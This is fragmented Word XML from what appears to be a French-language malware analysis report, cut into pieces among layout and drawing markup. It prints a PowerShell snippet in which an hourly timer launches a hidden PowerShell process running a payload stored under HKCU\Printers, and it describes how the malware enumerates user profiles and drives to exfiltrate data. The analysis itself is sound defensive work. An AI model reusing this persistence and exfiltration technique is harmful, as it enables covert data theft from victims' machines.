                            <w:spacing w:val="10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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> un objet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630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2242408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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System.Timers.Timer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configuré avec une durée de 3 600 000 millisecondes (1 heure).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7328" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3777614</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2457673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2958348" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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834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True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, l'orchestrateur garantit qu'il s'agit d'un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8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2457673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2894009" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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400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En définissant la propriété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AutoReset</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="15"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> sur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9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2654323</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3012145" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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214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cycle récurrent et non d'un événement ponctuel.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0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2947017</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4251794" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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179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2"/>
                            <w:spacing w:val="-7"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
                          </w:rPr>
                          <w:t xml:space="preserve">$UAIPh3lmau2x0g34RcX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  <w:shd w:val="clear" w:color="auto" w:fill="1213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  <w:shd w:val="clear" w:color="auto" w:fill="121314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  <w:shd w:val="clear" w:color="auto" w:fill="1213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3"/>
                            <w:spacing w:val="-7"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
                          </w:rPr>
                          <w:t xml:space="preserve">New-Object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  <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> System.Timers.timer;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1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3103621</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3011094" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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109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$UAIPh3lmau2x0g34RcX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.Interval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2"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3600000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2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3250941</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2936164" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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616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$UAIPh3lmau2x0g34RcX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.AutoReset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63"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">$true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3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3398261</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5688889" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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8889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Register-ObjectEvent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InputObject </w:t>
                        </w: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$UAIPh3lmau2x0g34RcX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EventName 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"Elapsed"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4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3545581</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="705282" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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282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Action {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5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3692901</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5168443" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8443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Start-Process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FilePath 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"powershell"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ArgumentList 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'[PAYLOAD IN HKCU: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6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3840221</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3755948" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5948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\rinters\plLmfuh4uctxjtrQSXC'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WindowStyle </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle63"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Hidden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3987541</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="110414" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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41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}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8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4134861</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2193214" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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321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$UAIPh3lmau2x0g34RcX</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle45"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">.Start</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle32"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">();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9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4558053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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Cette opération lance un nou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veau processus Powershell détaché à l'aide du paramètre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064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4750023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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15"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">-WindowStyle Hidden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08"/>
                            <w:spacing w:val="44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qui</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="16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exécutera</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="16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2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16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charge</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="16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utile</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="16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166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4965288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2793883" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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38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HKCU\Printers\plLmfuh4uctxjtrQSXC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2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5282153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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La fonction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plLmfuh4uctxjtrQSXC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 effectue une phase de reconnaissance afin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3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5478803</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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répertorier tous les disques durs locaux et partages réseau disponibles à la recherche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4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5652158</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fichiers statiques. Ce processus s’articule autour de deux mécanismes distincts conçus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5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5825513</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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explorer et exfiltrer les données présentes sur la partition système, la partition secondaire,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6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5998868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2806926" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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692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partages réseau ou les disques externes.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780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6273823</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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11"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1.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Le premier mécanisme cible les données spécifiques à l’utilisateur résidant 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sur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883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6465793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5428360" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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83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partition système. Le script interroge la classe WMI à l’aide de la commande </w:t>
                        </w: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gwmi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9856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6681058</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5367538" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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753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win32_userprofile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pour énumérer tous les profils présents sur la machine. Afin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088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6877708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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de s’assurer qu’il cible bien des utilisateurs légitimes plutôt que des comptes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190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7051063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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système, il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applique un filtre sur les identifiants de sécurité (SID) commençant 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2928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7243033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5366903" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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690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S-1-5-21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Cela exclut ainsi efficacement les comptes intégrés tels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3952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7458298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1123717" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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371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LocalService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4976" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2475865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7458298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4260098" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6009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S-1-5-19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) ou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NetworkService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S-1-5-20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). Pour chaque profil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0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7673563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5328055" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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805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correspondant identifié, le script extrait la propriété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LocalPath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 (par exemple,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7024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7888828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5165455" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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45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\Users\JohnDoe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 et transmet ce chemin directement à une fonction d’exfiltration.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804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8190253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565658" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6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11"/>
                          </w:rPr>
                          <w:t xml:space="preserve">2. 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Le deuxième mécanisme répertorie tous les systèmes de fichiers montés (partition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907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8363608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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système, partition secondaire, partages réseau ou disques externes) afin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009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8536963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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récupérer les données stockées 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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">sur les partitions secondaires ou les partages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112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8728933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5428360" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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83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réseau. Il exécute la commande </w:t>
                        </w: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Get-PSDrive -PSProvider FileSystem |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2144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8944198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5367538" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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753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Sort-Object Name -Descending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, en triant les résultats par ordre alphabétique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316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9139143</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5428360" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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83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décroissant afin de donner la priorité aux lecteurs non système (par exemple,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Z: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419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9315673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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avant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C: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). Pour chaque lettre de lecteur détectée, le code identifie le type de matériel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52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3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624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3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726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3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828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3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931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3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110336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5066674</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="502919"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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502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50291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502919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5029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2080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5067309</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="502285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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5022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502285">
                          <a:moveTo>
                            <a:pt x="3174" y="50228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502285"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="502285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="499110"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="499110"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="499110"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="499110"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="502285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  <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5874384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0272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990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5311140" cy="415289"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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1140" cy="415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11140" h="415289">
                          <a:moveTo>
                            <a:pt x="635" y="415289"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="215899"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4866005" y="215899"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4866005" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216534"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4866640" y="216534"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4046855" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4046855" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5310504" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5310504" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4046219" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="531114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9488" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2847339</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1522739</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2477770" cy="415289"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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7770" cy="415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7770" h="415289">
                          <a:moveTo>
                            <a:pt x="1055370" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1173480" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="415289"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="215899"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="772795" y="215899"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772795" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="773430" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1704975" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1704975" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2477135" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2477135" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1704340" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="247777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6656" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3801745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1738639</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1201423" cy="760729"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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1423" cy="7607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1419" h="760729">
                          <a:moveTo>
                            <a:pt x="0" y="760729"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="561339"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1201419" y="561339"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1201419" y="760729"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="101600" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101600" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="218440" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="21844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0752" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1396999</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2515879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1120140" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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014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014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119504" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1119504" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="112014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7136" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3923664</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2730509</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1894843" cy="1078230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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4843" cy="10782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94840" h="1078230">
                          <a:moveTo>
                            <a:pt x="1695450" y="1078230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1695450" y="878840"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1894840" y="878840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1894840" y="1078230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1078230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="878840"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="280669" y="878840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="280669" y="1078230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1569720" y="516889"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1569720" y="317500"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1769110" y="317500"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1769110" y="516889"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1569085" y="318135"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1769745" y="318135"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="361949" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="361949" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1706880" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1706880" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="361315" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1707515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9184" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2327275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4580899</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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1232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4580899</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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3280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6195069</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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5328" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2121535</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6195069</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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454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6410969</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="431168"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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311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31165">
                          <a:moveTo>
                            <a:pt x="0" y="431165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1099820" y="431165"/>
                          </a:lnTo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5760084" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760084" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="21526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5760084" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760084" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576071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5568" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1999615</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6841499</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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7616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6841499</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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9664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7508249</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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1712" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5315585</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7508249</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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5808" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1176019</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7722879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1346200" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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620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620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345565" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1345565" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="134620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9904" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5284470</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7722879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1099819" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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981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981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099185" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1099185" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="109981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60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7938779</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4592320" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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92320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92320" h="414020">
                          <a:moveTo>
                            <a:pt x="4591684" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4591684" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1609089" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4592320" y="21526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099185" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1099185" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="109982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8096" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2510155</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8153409</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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2192" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5598160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8369309</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1024889" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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488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4889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1024254" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1024254" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="102488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6288" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094104</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9104639</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="935993" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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99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599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935990" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="93599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731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3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833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3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976218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5428360" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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83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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">en exécutant une requête</w:t>
                        </w:r>
                        <w:r>
